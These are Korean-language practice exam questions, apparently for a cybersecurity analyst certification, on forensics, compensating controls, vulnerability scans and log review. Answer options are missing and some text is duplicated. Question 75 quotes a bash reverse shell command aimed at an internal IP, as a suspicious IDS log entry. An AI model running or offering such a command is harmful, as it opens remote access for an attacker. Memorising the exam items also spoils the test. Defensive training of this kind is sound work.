CS0-003 문제 71
손상된 시스템에 대한 포렌식 분석 중에 보안 분석가는 비정상적인 동작을 보이는 일부 바이너리를 발견합니다. 분석가는 문자열을 추출한 후 예상치 못한 내용을 발견합니다. 다음 중 분석가가 취해야 할 다음 단계는 무엇입니까?
CS0-003 문제 72
회사에는 민감한 데이터베이스에 대한 액세스를 제한하는 기본 제어 장치가 있습니다. 그러나 회사는 이 제어를 우회할 수 있는 인증 취약점을 발견했습니다. 다음 중 가장 좋은 보상제어는 무엇인가?
CS0-003 문제 73
보안 분석가는 다양한 유형의 취약점 검색을 수행합니다. 취약점 검색 결과를 검토하여 실행된 검색 유형과 각 장치에 대해 오탐지가 발생했는지 확인합니다.
지침:
생성된 결과 드롭다운 옵션을 선택하여 결과가 자격 증명 검사, 비인증 검사 또는 규정 준수 검사에서 생성되었는지 확인합니다.
자격 증명 및 비인증 스캔에 대해서만 오탐지 결과를 평가하고 오탐지를 표시하는 결과를 확인합니다. 참고: 현재 선택된 옵션을 선택 취소하려면 해당 옵션을 다시 클릭하십시오.
마지막으로 취약점 스캔 결과에 따라 서버를 결과에 드래그하여 서버 유형을 식별합니다.
Linux 웹 서버, 파일 인쇄 서버 및 디렉토리 서버는 드래그 가능합니다.
언제든지 시뮬레이션의 초기 상태를 되돌리려면 모두 재설정 버튼을 선택하십시오. 시뮬레이션이 완료되면 완료 버튼을 선택하여 제출하세요. 시뮬레이션이 제출되면 다음 버튼을 선택하여 계속 진행하세요.
지침:
생성된 결과 드롭다운 옵션을 선택하여 결과가 자격 증명 검사, 비인증 검사 또는 규정 준수 검사에서 생성되었는지 확인합니다.
자격 증명 및 비인증 스캔에 대해서만 오탐지 결과를 평가하고 오탐지를 표시하는 결과를 확인합니다. 참고: 현재 선택된 옵션을 선택 취소하려면 해당 옵션을 다시 클릭하십시오.
마지막으로 취약점 스캔 결과에 따라 서버를 결과에 드래그하여 서버 유형을 식별합니다.
Linux 웹 서버, 파일 인쇄 서버 및 디렉토리 서버는 드래그 가능합니다.
언제든지 시뮬레이션의 초기 상태를 되돌리려면 모두 재설정 버튼을 선택하십시오. 시뮬레이션이 완료되면 완료 버튼을 선택하여 제출하세요. 시뮬레이션이 제출되면 다음 버튼을 선택하여 계속 진행하세요.
CS0-003 문제 74
웹 서버 로그를 검토하는 동안 보안 분석가는 다음과 같은 의심스러운 줄을 발견했습니다.
다음 중 시도되고 있는 것은 무엇입니까?
다음 중 시도되고 있는 것은 무엇입니까?
CS0-003 문제 75
보안 분석가는 호스트 기반 IDS 로그에서 다음과 같은 의심스러운 항목을 식별했습니다.
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
활동이 진행 중인지 가장 정확하게 확인하기 위해 분석가가 사용해야 하는 쉘 스크립트는 다음 중 무엇입니까?
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
활동이 진행 중인지 가장 정확하게 확인하기 위해 분석가가 사용해야 하는 쉘 스크립트는 다음 중 무엇입니까?